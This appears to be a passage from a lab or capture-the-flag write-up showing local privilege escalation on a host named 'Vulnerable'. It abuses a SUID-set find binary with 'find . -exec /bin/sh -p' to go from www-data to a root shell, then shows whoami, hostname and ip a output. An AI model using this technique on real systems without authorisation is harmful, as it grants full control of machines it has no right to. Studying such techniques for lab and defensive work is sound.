find
The binary, find, has its SUID bit set
find can be leveraged for privilege escalation if it has SUID bit set
www-data@Vulnerable:/var/www/html/joomla/_test$ which find
/usr/bin/findIt’s located in the /usr/bin directory
www-data@Vulnerable:/var/www/html/joomla/_test$ /usr/bin/find . -exec /bin/sh -p \; -quit
# whoami
whoami
root
# hostname
hostname
Vulnerable
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:74:6d:86:fb:87 brd ff:ff:ff:ff:ff:ff
inet 10.10.124.235/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::74:6dff:fe86:fb87/64 scope link
valid_lft forever preferred_lft foreverSystem Level Compromise